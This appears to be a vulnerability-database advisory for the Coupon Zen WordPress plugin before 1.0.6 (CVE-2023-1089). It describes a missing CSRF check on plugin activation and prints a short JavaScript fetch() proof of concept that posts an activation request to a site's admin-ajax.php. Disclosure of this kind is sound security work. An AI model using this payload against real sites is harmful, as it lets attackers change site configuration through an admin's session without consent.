Lucene search
WpvulndbWPEX-ID:9787E26F-33FE-4C65-ABB3-7F5C76AE8D6FHistoryFeb 28, 2023 - 12:00 a.m.
Coupon Zen < 1.0.6 - Arbitrary Plugin Activation via CSRF
2023-02-2800:00:00
wpvulndb
48
security exploit
arbitrary activation
csrf
wordpress plugin
0.001 Low
EPSS
Percentile
21.2%
The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack
fetch('https://example.com/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=couponzen_ajax_plugin_activation&location=woocommerce/woocommerce.php',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
Related
wpvulndb
wpvulndb
Coupon Zen < 1.0.6 - Arbitrary Plugin Activation via CSRF
2023-02-28 00:00:00
nvd
nvd
CVE-2023-1089
2023-03-27 16:15:09
prion
prion
Cross site request forgery (csrf)
2023-03-27 16:15:00
cvelist
cvelist
CVE-2023-1089 Coupon Zen < 1.0.6 - Arbitrary Plugin Activation via CSRF
2023-03-27 15:37:20
cve
cve
CVE-2023-1089
2023-03-27 16:15:09